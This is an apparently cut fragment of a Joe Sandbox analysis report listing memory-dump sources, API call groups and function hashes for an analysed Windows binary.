                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_daylight$_isindst
                                                                                          • String ID:
                                                                                          • API String ID: 4170891091-0
                                                                                          • Opcode ID: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
                                                                                          • Instruction ID: a7dc10e4d077f892511bacf74192df23197b58cd366618055b33e2bd3136c0bb
                                                                                          • Opcode Fuzzy Hash: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
                                                                                          • Instruction Fuzzy Hash: 8F51E672F0D212CAFB14FF64D9956BC67A1BB11368F910236DE1E96AE5DF38A402C704
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                          • String ID:
                                                                                          • API String ID: 1452418845-0
                                                                                          • Opcode ID: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
                                                                                          • Instruction ID: 84e19a3c6b49aa60a89c8e513101e47f6858ca7f38e4792b36cfb9463e8517e9
                                                                                          • Opcode Fuzzy Hash: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
                                                                                          • Instruction Fuzzy Hash: 92315B61E0D603C1FA24BBA4D4523B92B95EF59788FC54435EE0ECB2E7DE2CB408C219
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 1279662727-0
                                                                                          • Opcode ID: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
                                                                                          • Instruction ID: a30d9a043f4ad4c0eedc45bb9af4477be013c02debf3eb872ade331cff2a4e9c
                                                                                          • Opcode Fuzzy Hash: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
                                                                                          • Instruction Fuzzy Hash: 2041BA22E1C782C3F750BB21D5043A96361FFA47A4F519335EA9C93AD2DF6CA5A08704
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
                                                                                          • Instruction ID: 3473225b50d46aff8c0a914eac46aed7a6b3c70addfe5e879a3baf1667259afc
                                                                                          • Opcode Fuzzy Hash: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
                                                                                          • Instruction Fuzzy Hash: 3CD09E50F4D60BC2FB247B719C9907822169FA8B01F925838DD5B963A3DD2DA84D4348
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateDirectoryMessage
                                                                                          • String ID: Security descriptor is not initialized!
                                                                                          • API String ID: 73271072-986317556
                                                                                          • Opcode ID: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
                                                                                          • Instruction ID: 8ce7681559dc066dcf672fcd60be27c9729ca68c33d639123053df9b97d6ac86
                                                                                          • Opcode Fuzzy Hash: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
                                                                                          • Instruction Fuzzy Hash: 11E0EDB1A1D706C6EA50BB14E84566922A0FB65754FD01334E95DC63E4EF3CE1198B44
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                                                          • Instruction ID: c54087bf5c941e78f0c2cc9d495e18375070df7735864bf59ea838109e95dfb8
                                                                                          • Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                                                          • Instruction Fuzzy Hash: E151D461B0D281C6FA68BF36D500A7A6681BF45BB4F9A4B34DD6C877C5CE3CE401C628
                                                                                          APIs
                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF64778B099,?,?,00000000,00007FF64778B14E), ref: 00007FF64778B28A
                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF64778B099,?,?,00000000,00007FF64778B14E), ref: 00007FF64778B294
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChangeCloseErrorFindLastNotification
                                                                                          • String ID:
                                                                                          • API String ID: 1687624791-0
                                                                                          • Opcode ID: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
                                                                                          • Instruction ID: 9332ea01cf42cb850c519046d768e9686e47189d7ed7d3677b22b80a292abc85
                                                                                          • Opcode Fuzzy Hash: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
                                                                                          • Instruction Fuzzy Hash: 7321C321B1C6C2C1FA90B7A1D49427D12929F847E4FCA4235DE2EC77F6DE6CE4858309
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 2976181284-0
                                                                                          • Opcode ID: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
                                                                                          • Instruction ID: a9515d720856ef20da4a6b2c259c9124ed6f693857d5ed023b63a70ff3893668
                                                                                          • Opcode Fuzzy Hash: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
                                                                                          • Instruction Fuzzy Hash: 6311BF61A1CB81C1EA10BB25E404069A761EB44BF4F940331EE7D87BE9CF7CD0598744
                                                                                          APIs
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF647788039), ref: 00007FF6477881DF
                                                                                          • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF647788039), ref: 00007FF6477881F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$System$FileLocalSpecific
                                                                                          • String ID:
                                                                                          • API String ID: 1707611234-0
                                                                                          • Opcode ID: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
                                                                                          • Instruction ID: 5471c1dd55ec371c5e29f409ebe85d98a542606ad9c778c1eb80ef898dc9f91f
                                                                                          • Opcode Fuzzy Hash: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
                                                                                          • Instruction Fuzzy Hash: 65018E2292C692C2E750BB14E40127EB3A0FB81BA1FA00235EAAD815E8DF7CD010CB04
                                                                                          APIs
                                                                                          • RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B022
                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B02C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: BoundaryDeleteDescriptorErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 2050971199-0
                                                                                          • Opcode ID: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                                          • Instruction ID: 041d02b3a66a2f8b9219fc67d2ee11f41be58dc347456f1a2d183fad2e3bbd11
                                                                                          • Opcode Fuzzy Hash: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                                          • Instruction Fuzzy Hash: 0FE0C250F0D202C2FF18BBF2D84583811919F98B45FC54434DC2DC72A2DE2CA8858628
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 2018770650-0
                                                                                          • Opcode ID: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
                                                                                          • Instruction ID: 1406309ecc1c9aaa44aa99df4dceed7a663ee69d32bc3aed0b447b84b77b3dc8
                                                                                          • Opcode Fuzzy Hash: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
                                                                                          • Instruction Fuzzy Hash: CFD01250F2E503C1F65437B69C4607911A26F55B71FD10630DC2DC21E0DE3CA0850119
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryErrorLastRemove
                                                                                          • String ID:
                                                                                          • API String ID: 377330604-0
                                                                                          • Opcode ID: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
                                                                                          • Instruction ID: 5ffb1c57dd8f4c4ecc7eedcb41585d233c6fb17e2d2175b5ddceb253bf4a5f42
                                                                                          • Opcode Fuzzy Hash: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
                                                                                          • Instruction Fuzzy Hash: 49D01210F1E503C2F65437B79C8787921955F55730FD10770DC2EC01E0DE2CA0860219
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF647778BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A
                                                                                          • _findclose.LIBCMT ref: 00007FF647777FA9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide_findclose
                                                                                          • String ID:
                                                                                          • API String ID: 2772937645-0
                                                                                          • Opcode ID: 5d60b06fc9f4bb83c594c7e5293bb97dce9ec5e9439419983571f2289f3b39da
                                                                                          • Instruction ID: 7506732061a91862296a5e7224b7747cd58b01cc15d31deda9443d01c966afd4
                                                                                          • Opcode Fuzzy Hash: 5d60b06fc9f4bb83c594c7e5293bb97dce9ec5e9439419983571f2289f3b39da
                                                                                          • Instruction Fuzzy Hash: 7E719852E18AC5C1EA10EB2CC5452FD6360FBA9B48F95E321DF8C52592EF28E2D9C344
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
                                                                                          • Instruction ID: bf81139c387b2b0dc4c26994ca84473a47679701c6defcfb655d3dcb38612c8f
                                                                                          • Opcode Fuzzy Hash: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
                                                                                          • Instruction Fuzzy Hash: 1041B072A0C241C3EA34FB29E5402797BA1EF56B95F921271DE8EC3790CF2CE40AC655
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryErrorLastRemove
                                                                                          • String ID:
                                                                                          • API String ID: 377330604-0
                                                                                          • Opcode ID: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
                                                                                          • Instruction ID: 4067081b098fa3c5ad1aecb1ef1e5ff6c800ca93019cb382ee88a509ac81b8cb
                                                                                          • Opcode Fuzzy Hash: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
                                                                                          • Instruction Fuzzy Hash: FF415016E1CB85C1EA51BB28D5112FD6360FBA5744FD5A232EF8D82193EF6CB5D88304
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _fread_nolock
                                                                                          • String ID:
                                                                                          • API String ID: 840049012-0
                                                                                          • Opcode ID: b98f66e4a09d3080de4f7931106bb7b6ba15956e2f28422e24f31262f9d98128
                                                                                          • Instruction ID: 67511355297fc6cd7af164d43b4d65419c09abac64883737762b22c8cf63becd
                                                                                          • Opcode Fuzzy Hash: b98f66e4a09d3080de4f7931106bb7b6ba15956e2f28422e24f31262f9d98128
                                                                                          • Instruction Fuzzy Hash: 7D216822B0C292C6FA50BB26A9047BEA651FF45BD4FC85430EE0D8B786DE7DF441C608
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
                                                                                          • Instruction ID: dd8e1b21d95293af4f20e2df9d2e8d6832086ad0115376d132fb2add4095ccdf
                                                                                          • Opcode Fuzzy Hash: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
                                                                                          • Instruction Fuzzy Hash: 9731AD22A1C702C5F751BF65C8413783A51AF84BA5FC20675EE2C873D2CE7CE8498719
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                          • String ID:
                                                                                          • API String ID: 3947729631-0
                                                                                          • Opcode ID: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
                                                                                          • Instruction ID: b1d515fb2853ea1d4379c6f723f37238f6c79ebf4cf215dc9b097946f2761603
                                                                                          • Opcode Fuzzy Hash: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
                                                                                          • Instruction Fuzzy Hash: 3D217C72B08746CAEB24AF74C4403AC37A0EB0471CF960636DA2D86AD6EF38D584CB54
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
